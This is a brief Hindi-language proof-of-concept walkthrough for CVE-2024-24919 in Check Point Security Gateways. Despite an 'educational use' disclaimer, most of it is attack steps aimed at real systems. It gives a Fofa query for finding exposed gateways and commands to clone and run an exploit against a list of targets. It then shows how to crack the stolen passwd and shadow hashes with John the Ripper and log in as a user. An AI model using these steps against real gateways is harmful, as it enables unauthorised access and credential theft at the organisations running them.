
POC - CVE-2024–24919 - Check Point Security Gateways
इंटरनेट से कनेक्ट होने और रिमोट एक्सेस VPN या मोबाइल एक्सेस सॉफ्टवेयर ब्लेड्स के साथ सक्षम होने पर, एक हमलावर चेक पॉइंट सुरक्षा गेटवे पर कुछ जानकारी पढ़ सकता है। इस भेद्यता को कम करने वाला एक सुरक्षा पैच उपलब्ध है।
इसके बारे में पढ़ें — CVE-2024-24919
अस्वीकरण: यह प्रूफ ऑफ कॉन्सेप्ट (POC) केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए बनाया गया है। इस उपकरण का उपयोग पूर्व पारस्परिक सहमति के बिना लक्ष्यों पर हमला करने के लिए करना अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
संभावित लक्ष्य खोजने के लिए, Fofa (Shodan.io के समान) का उपयोग करें:
app=”Check_Point-SSL-Network-Extender”
सबसे पहले, रिपॉजिटरी को क्लोन करें:
git clone https://github.com/verylazytech/CVE-2024-24919
इसके बाद अपना लक्ष्य चुनें और इसे list.txt फ़ाइल में इस प्रारूप में जोड़ें:
एक्सप्लॉइट चलाएँ:
python3 CVE-2024-24919.py -l list.txt
अब आउटपुट के 2 विकल्प हैं:
असफल:

सफल:

अब जब आप passwd और shadow दोनों फ़ाइलें ढूंढ लेते हैं, तो आप JohnTheRipper के साथ हैश को क्रैक करने का प्रयास कर सकते हैं। एक्सप्लॉइट चलाने के बाद आपके पास 2 फ़ाइलें होती हैं, passwd और shadow, इसलिए आप उन्हें एक फ़ाइल में मर्ज करके क्रैक करने का प्रयास कर सकते हैं (मैंने rockyou.txt का उपयोग किया लेकिन यह कोई भी पासवर्ड वर्डलिस्ट हो सकती है):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

और अब जब हम हैश क्रैक कर लेते हैं तो हम उपयोगकर्ता में लॉगिन कर सकते हैं!